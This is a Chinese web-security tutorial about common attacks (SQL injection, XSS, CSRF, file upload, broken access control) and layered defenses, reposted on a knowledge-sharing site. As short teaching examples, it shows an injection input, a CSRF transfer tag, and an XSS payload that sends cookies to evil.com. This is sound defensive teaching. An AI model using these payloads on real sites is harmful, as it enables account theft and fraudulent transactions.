前端验证做了，WAF也上了，还是被黑了

当前位置：点晴教程→知识管理交流 →『技术文档交流』

admin

2026年6月13日 12:22 本文热度 93

Web 常见攻击与防护思路

一个真实的安全事故切片

2023年，某电商平台因为一个SQL注入漏洞，导致200万用户数据泄露。攻击者只花了一晚上时间，就拿到了数据库的完全控制权。

事后复盘发现，漏洞的成因非常简单：一个忘记做参数过滤的搜索接口。开发者在代码审查时忽略了它，测试团队没有覆盖到这个边界情况，安全团队也没有在上线前做渗透测试。

这不是个例。根据CNVD的统计数据，2023年收录的安全漏洞中，Web应用漏洞占比超过35%。其中大部分都是类似的基础性问题：输入验证缺失、权限控制不严、敏感信息泄露。

Web安全不是高深莫测的黑客技术，而是每个开发者都需要掌握的基本功。今天这篇文章，我们来系统梳理最常见的Web攻击类型和防护方案。

五大常见攻击类型解析

1. SQL注入：最经典也是危害最大的攻击

SQL注入的原理很简单：攻击者通过构造特殊的输入，改变原本的SQL语句逻辑，从而执行任意数据库操作。

一个典型的例子：

// 危险代码 $sql = "SELECT * FROM users WHERE id = " . $_GET['id']; // 攻击者输入: 1 OR 1=1 // 实际执行: SELECT * FROM users WHERE id = 1 OR 1=1 // 返回所有用户数据

这种攻击的危害包括：数据泄露、数据篡改、甚至获取服务器控制权。

2. XSS（跨站脚本攻击）：潜伏在用户浏览器中的陷阱

XSS的核心是：攻击者把恶意脚本注入到网页中，当其他用户访问时，脚本在用户浏览器中执行。

常见场景：评论区、用户昵称、搜索结果展示等任何用户输入会被展示的地方。

// 攻击者输入<script>     fetch('http://evil.com/steal?cookie=' + document.cookie) </script> // 任何访问该页面的用户，Cookie都会被发送到攻击者服务器

XSS的危害包括：盗取用户账号、钓鱼攻击、传播蠕虫病毒。

3. CSRF（跨站请求伪造）：借刀杀人

CSRF的原理是：攻击者诱导用户访问恶意网站，该网站自动向目标网站发送请求，由于用户已登录，请求会携带用户的身份凭证。

典型场景：用户登录了银行网站，访问恶意网站后，恶意网站自动发起转账请求。

<!-- 恶意网站代码 --><img src="http://bank.com/transfer?to=attacker&amount=10000">

用户甚至看不到任何异常，钱已经转走了。

4. 文件上传漏洞：上传的不是图片，是木马

很多网站允许用户上传文件，比如头像、附件。如果没有严格验证上传文件的类型和内容，攻击者可以上传Web Shell，获得服务器控制权。

常见问题：只检查文件扩展名（可伪造）、不检查文件内容、上传后文件可被执行。

5. 越权访问：身份验证不等于权限控制

越权访问分为水平越权和垂直越权：

•水平越权：普通用户A可以访问普通用户B的数据

•垂直越权：普通用户可以执行管理员操作

典型场景：订单查询接口只验证用户是否登录，没有验证订单是否属于当前用户。

GET /api/order/12345 // 用户A登录后，直接修改订单ID，就能看到用户B的订单

常见防护误区

误区一：前端验证就够了

很多开发者认为，在前端做输入验证和输出编码就能防护。

事实：攻击者可以绕过前端，直接向服务器发送请求。前端验证只是提升用户体验，不能替代后端安全控制。

误区二：有了WAF就安全了

WAF（Web应用防火墙）可以拦截大量常见攻击，但它不是万能的。

事实：WAF存在绕过方式，无法防护业务逻辑漏洞，而且会产生误报。WAF是防护体系的一部分，不能替代代码层面的安全措施。

误区三：框架会自动处理安全问题

现代Web框架确实内置了很多安全机制，比如参数化查询、CSRF Token。

事实：框架只提供工具，正确使用是开发者的责任。如果开发者绕过框架机制，或者使用不当，依然会产生漏洞。

分层防护实战方案

Web安全防护需要多层防御，每一层都有特定的职责。

第一层：输入验证

原则：永远不要信任用户输入。

具体措施：

•白名单验证：只接受符合预期格式的输入

•类型检查：确保输入是预期类型（数字、日期、邮箱等）

•长度限制：防止缓冲区溢出和拒绝服务攻击

•特殊字符过滤：根据输入场景过滤危险字符

# 白名单验证示例import redef validate_username(username):    """    用户名白名单验证函数    规则：仅允许字母、数字、下划线，长度 3-20 位    """    # 正则表达式：^开头 $结尾 [a-zA-Z0-9_] 允许的字符 {3,20} 长度限制    if not re.match(r'^[a-zA-Z0-9_]{3,20}$', username):        raise ValueError("用户名格式不正确")    return username

第二层：输出编码

原则：根据输出上下文，对数据进行编码。

不同场景需要不同的编码方式：

•HTML上下文：HTML实体编码

•JavaScript上下文：Unicode转义

•URL上下文：URL编码

•SQL上下文：参数化查询（不是编码，是独立的防护机制）

// 输出到HTML时进行转义，防止XSS攻击与HTML解析异常function escapeHtml(text) {  // 定义HTML特殊字符映射表  const map = {    '&': '&amp;',    '<': '&lt;',    '>': '&gt;',    '"': '&quot;',    "'": '&#039;'  };  // 全局替换所有特殊字符为安全的HTML实体  return text.replace(/[&<>"']/g, m => map[m]);}

第三层：权限控制

原则：最小权限原则，每个操作都要验证权限。

具体措施：

•身份认证：确保用户是谁

•权限验证：确保用户有权执行操作

•资源归属检查：确保用户只能访问自己的资源

# 权限验证示例：仅允许用户访问自己的订单def get_order(order_id, current_user):    # 根据订单ID查询订单    order = Order.query.get(order_id)
    # 验证订单归属：只有订单所属用户才能查看    if order.user_id != current_user.id:        raise PermissionError("无权访问此订单")
    return order

第四层：安全框架与工具

利用成熟的安全框架和工具，减少重复造轮子：

•ORM框架：自动处理SQL注入防护

•CSRF Token机制：框架内置的CSRF防护

•CSP（内容安全策略）：限制脚本执行来源

•安全头设置：X-Frame-Options、X-Content-Type-Options等

安全开发流程建议

代码层面的防护只是基础，真正的安全需要流程保障。

1. 代码审查中的安全检查

在代码审查环节加入安全检查清单：

•用户输入是否都经过验证

•数据库操作是否使用参数化查询

•敏感数据是否加密存储

•权限验证是否完整

2. 自动化安全测试

将安全测试纳入CI/CD流程：

•SAST（静态应用安全测试）：扫描代码中的安全漏洞

•DAST（动态应用安全测试）：模拟攻击测试运行中的应用

•依赖检查：扫描第三方库的已知漏洞

推荐工具：SonarQube、OWASP ZAP、Snyk

3. 持续监控与应急响应

安全不是一次性的工作：

•日志记录：记录关键操作和异常请求

•入侵检测：监控异常访问模式

•应急预案：制定漏洞响应流程，包括修复、通知、复盘

从今天开始做一次安全自查

Web安全是一场持续的攻防战。新的攻击方式不断出现，防护方案也需要不断更新。

作为开发者，你可以从这些小事做起：

1.检查项目中所有用户输入点，确认都做了验证

2.确认所有数据库操作都使用参数化查询

3.为敏感接口添加权限验证

4.设置内容安全策略（CSP）

5.订阅安全公告，关注常用框架的安全更新

安全不是技术问题，是意识问题。保持敬畏，持续学习。

该文章在 2026/6/13 12:22:28 编辑过

关键字查询

做了

前端

验证

正在查询...

点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。

点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理，结合码头的业务特点，围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体，是物流码头及其他港口类企业的高效ERP管理信息系统。

点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。

点晴免费OA是一款软件和通用服务都免费，不限功能、不限时间、不限用户的免费OA协同办公管理系统。